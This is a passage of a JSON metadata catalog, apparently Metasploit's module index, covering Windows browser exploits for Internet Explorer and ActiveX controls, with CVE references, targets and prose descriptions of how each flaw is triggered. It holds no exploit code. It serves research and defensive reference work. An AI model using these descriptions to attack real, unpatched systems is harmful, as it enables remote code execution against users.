],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_059_cflatmarkuppointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_069_caret": {
"name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",
"full_name": "exploit/windows/browser/ms13_069_caret",
"rank": 300,
"disclosure_date": "2013-09-10",
"type": "exploit",
"author": [
"corelanc0d3r",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. Precise control of\n the freed object allows arbitrary code execution under the context of the user.",
"references": [
"CVE-2013-3205",
"OSVDB-97094",
"MSB-MS13-069",
"ZDI-13-217"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_069_caret.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_069_caret",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_080_cdisplaypointer": {
"name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
"full_name": "exploit/windows/browser/ms13_080_cdisplaypointer",
"rank": 300,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.",
"references": [
"CVE-2013-3897",
"OSVDB-98207",
"MSB-MS13-080",
"URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx",
"URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_080_cdisplaypointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_090_cardspacesigninhelper": {
"name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",
"full_name": "exploit/windows/browser/ms13_090_cardspacesigninhelper",
"rank": 300,
"disclosure_date": "2013-11-08",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.",
"references": [
"CVE-2013-3918",
"OSVDB-99555",
"BID-63631",
"MSB-MS13-090",
"URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP with IE 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_090_cardspacesigninhelper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_012_cmarkup_uaf": {
"name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
"full_name": "exploit/windows/browser/ms14_012_cmarkup_uaf",
"rank": 300,
"disclosure_date": "2014-02-13",
"type": "exploit",
"author": [
"Unknown",
"Jean-Jamil Khalife",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use-after-free condition in Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.",
"references": [
"CVE-2014-0322",
"MSB-MS14-012",
"BID-65551",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html",
"URL-http://hdwsec.fr/blog/CVE-2014-0322.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / IE 10 / FP 12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_012_cmarkup_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_012_textrange": {
"name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free",
"full_name": "exploit/windows/browser/ms14_012_textrange",
"rank": 300,
"disclosure_date": "2014-03-11",
"type": "exploit",
"author": [
"Jason Kratzer",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.",
"references": [
"CVE-2014-0307",
"MSB-MS14-012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_012_textrange.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_012_textrange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_064_ole_code_execution": {
"name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
"full_name": "exploit/windows/browser/ms14_064_ole_code_execution",
"rank": 400,
"disclosure_date": "2014-11-13",
"type": "exploit",
"author": [
"Robert Freeman",
"yuange",
"Rik van Duijn",
"Wesley Neelen",
"GradiusX <francescomifsud@gmail.com>",
"b33f",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 through version 11 on\n Windows 95 up to Windows 10, with no patch available for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 boxes due to the Powershell limitation.\n\n Windows XP by default supports VBS, therefore it is used as the attack vector. On other\n newer Windows systems, the exploit will try using Powershell instead.",
"references": [
"CVE-2014-6332",
"MSB-MS14-064",
"OSVDB-114533",
"EDB-35229",
"EDB-35308",
"URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows",
"URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP",
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_064_ole_code_execution",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms16_051_vbscript": {
"name": "Internet Explorer 11 VBScript Engine Memory Corruption",
"full_name": "exploit/windows/browser/ms16_051_vbscript",
"rank": 300,
"disclosure_date": "2016-05-10",
"type": "exploit",
"author": [
"Theori",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.",
"references": [
"CVE-2016-0189",
"MSB-MS16-051"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 10 with IE 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms16_051_vbscript",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/msvidctl_mpeg2": {
"name": "Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",
"full_name": "exploit/windows/browser/msvidctl_mpeg2",
"rank": 300,
"disclosure_date": "2009-07-05",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid",
"references": [
"CVE-2008-0015",
"OSVDB-55651",
"BID-35558",
"MSB-MS09-032",
"MSB-MS09-037",
"URL-http://www.microsoft.com/technet/security/advisory/972890.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb",
"is_install_path": true,
"ref_name": "windows/browser/msvidctl_mpeg2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mswhale_checkforupdates": {
"name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/mswhale_checkforupdates",
"rank": 300,
"disclosure_date": "2009-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to the CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-2238",
"OSVDB-53933",
"URL-http://technet.microsoft.com/en-us/library/dd282918.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb",
"is_install_path": true,
"ref_name": "windows/browser/mswhale_checkforupdates",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/msxml_get_definition_code_exec": {
"name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
"full_name": "exploit/windows/browser/msxml_get_definition_code_exec",
"rank": 400,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"inking26",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.",
"references": [
"CVE-2012-1889",
"BID-53934",
"OSVDB-82873",
"MSB-MS12-043",
"URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
"URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Vista SP2",
"IE 8 on Windows XP SP3",
"IE 8 with Java 6 on Windows XP SP3",
"IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/msxml_get_definition_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nctaudiofile2_setformatlikesample": {
"name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow",
"full_name": "exploit/windows/browser/nctaudiofile2_setformatlikesample",
"rank": 300,
"disclosure_date": "2007-01-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2007-0018",
"OSVDB-32032",
"BID-22196",
"US-CERT-VU-292713"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 Pro English (IE6)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb",
"is_install_path": true,
"ref_name": "windows/browser/nctaudiofile2_setformatlikesample",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nis2004_antispam": {
"name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/nis2004_antispam",
"rank": 300,
"disclosure_date": "2004-03-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2004-0363",
"OSVDB-6249",
"BID-9916"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/nis2004_antispam.rb",
"is_install_path": true,
"ref_name": "windows/browser/nis2004_antispam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nis2004_get": {
"name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/nis2004_get",
"rank": 300,
"disclosure_date": "2007-05-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-1689",
"OSVDB-36164",
"URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/nis2004_get.rb",
"is_install_path": true,
"ref_name": "windows/browser/nis2004_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/notes_handler_cmdinject": {
"name": "IBM Lotus Notes Client URL Handler Command Injection",
"full_name": "exploit/windows/browser/notes_handler_cmdinject",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"Moritz Jodeit",
"Sean de Regge",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in the URL handler for\n the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with arbitrary\n arguments as well. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.",
"references": [
"CVE-2012-2174",
"OSVDB-83063",
"BID-54070",
"ZDI-12-154",
"URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb",
"is_install_path": true,
"ref_name": "windows/browser/notes_handler_cmdinject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novell_groupwise_gwcls1_actvx": {
"name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/novell_groupwise_gwcls1_actvx",
"rank": 300,
"disclosure_date": "2013-01-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. Several methods in the GWCalServer control use user provided data as\n a pointer, which allows reading arbitrary memory and executing arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.",
"references": [
"CVE-2012-0439",
"OSVDB-89700",
"BID-57658",
"ZDI-13-008",
"URL-http://www.novell.com/support/kb/doc.php?id=7011688"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb",
"is_install_path": true,
"ref_name": "windows/browser/novell_groupwise_gwcls1_actvx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_callbackurl": {
"name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_callbackurl",
"rank": 300,
"disclosure_date": "2010-08-20",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2010-1527",
"OSVDB-67411",
"URL-http://secunia.com/secunia_research/2010-104/",
"EDB-15042"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_callbackurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_datetime": {
"name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_datetime",
"rank": 500,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.",
"references": [
"CVE-2009-1569",
"BID-37242",
"OSVDB-60804",
"URL-http://secunia.com/advisories/35004/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iPrint 5.30 Windows Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_datetime.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_datetime",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_executerequest": {
"name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_executerequest",
"rank": 300,
"disclosure_date": "2008-02-22",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0935",
"OSVDB-42063",
"BID-27939"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_executerequest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_executerequest_dbg": {
"name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_executerequest_dbg",
"rank": 300,
"disclosure_date": "2010-08-04",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-3106",
"OSVDB-66960",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06",
"EDB-15001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_executerequest_dbg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_getdriversettings": {
"name": "Novell iPrint Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_getdriversettings",
"rank": 300,
"disclosure_date": "2008-06-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2908",
"OSVDB-46194",
"URL-http://secunia.com/advisories/30709/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_getdriversettings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_getdriversettings_2": {
"name": "Novell iPrint Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_getdriversettings_2",
"rank": 300,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Dr_IDE"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4321",
"BID-44966",
"OSVDB-69357",
"ZDI-10-256",
"EDB-16014",
"URL-http://www.novell.com/support/viewContent.do?externalId=7007234"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_getdriversettings_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_target_frame": {
"name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_target_frame",
"rank": 500,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.",
"references": [
"CVE-2009-1568",
"BID-37242",
"OSVDB-60803",
"URL-http://secunia.com/advisories/37169/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iPrint 5.30 Windows Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_target_frame",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ntr_activex_check_bof": {
"name": "NTR ActiveX Control Check() Method Buffer Overflow",
"full_name": "exploit/windows/browser/ntr_activex_check_bof",
"rank": 300,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. In order to bypass\n DEP and ASLR on Windows Vista and Windows 7, JRE 6 is needed.",
"references": [
"CVE-2012-0266",
"OSVDB-78252",
"BID-51374",
"URL-http://secunia.com/secunia_research/2012-1/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ntr_activex_check_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ntr_activex_stopmodule": {
"name": "NTR ActiveX Control StopModule() Remote Code Execution",
"full_name": "exploit/windows/browser/ntr_activex_stopmodule",
"rank": 300,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0267",
"OSVDB-78253",
"BID-51374",
